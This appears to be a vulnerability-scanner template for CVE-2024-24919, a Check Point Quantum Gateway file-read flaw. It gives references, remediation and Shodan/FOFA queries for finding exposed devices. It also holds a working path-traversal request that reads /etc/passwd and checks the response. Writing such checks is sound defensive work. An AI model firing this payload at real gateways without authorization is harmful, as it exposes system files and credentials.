id: CVE-2024-24919

info:
  name: Check Point Quantum Gateway - Information Disclosure
  author: johnk3r,s4e-io
  severity: high
  description: |
    Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
  impact: |
    Unauthenticated attackers can read arbitrary files on Check Point Security Gateways, potentially exposing sensitive configuration files and credentials.
  remediation: |
    Apply Check Point security fixes for CVE-2024-24919 as specified in SK182337.
  reference:
    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
    - https://support.checkpoint.com/results/sk/sk182337
    - https://s4e.io/tools/check-point-quantum-gateway-information-disclosure-cve-2024-24919
    - https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html
    - https://censys.com/cve-2024-24919/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-24919
    cwe-id: CWE-200
    epss-score: 0.94342
    epss-percentile: 0.99957
    cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: checkpoint
    product: quantum_security_gateway
    shodan-query:
      - html:"Check Point SSL Network"
      - http.html:"check point ssl network"
    fofa-query: body="check point ssl network"
  tags: cve,cve2024,checkpoint,lfi,kev,vkev,vuln

http:
  - raw:
      - |
        POST /clients/MyCRL HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

        aCSHELL/../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*"
          - "nobody:.*"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206e938d54f660967f31aa59d6fc335c05d8130453e30be5a16401f559d9f2153d022100a5b16f789da42c9943bb14bc36fa461c60327e7f50431626eea300ebba45eb6b:922c64590222798bb761d5b6d8e72950